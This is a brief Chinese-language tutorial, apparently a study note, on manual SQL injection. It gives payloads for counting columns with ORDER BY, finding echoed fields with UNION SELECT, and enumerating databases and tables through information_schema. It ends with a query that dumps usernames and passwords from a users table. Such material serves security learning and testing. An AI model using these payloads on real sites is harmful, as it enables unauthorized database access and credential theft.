在一个又sql注入的网站里面 我列出几个列出数据表信息的东西
0x01 order by 来判断数据库的字段数 例如 ?id=1 order by 1这样 然后我们依此增加数字 直到报错就可以知道 这个数据库字段的数量
0x02 通过union来连接前面的id 和后面的select 语言 形式如下 ?id=1' union select 1,2,3 --+ 通过这个语言我们来判断sql语言的回显 回显的意思就是 判断语句再那个字段是可以起到作用的
0x03 在前面的基础上我们可以把数据库都进行一个列出 (select group_concat(schema_name) from information_schema.schemata) 这里稍微进行一下解释 group_concat 返回的一些数据用逗号进行想连接 schema 是一个元数据库 平时我们在使用show databases的时候其实就是从这个表中查询的数据 然后schema_name 很明显就是数据库的名字 然后 就是从schemata存储的地方进行一个获取
0x03 和前面比较相似 这个是获取数据表的 select group_concat(table_name) from information_schema.tables)
0x04 获取用户的用户名和密码 select group_concat(username separator ';') from users; 相应的密码就是把username改成password就可以了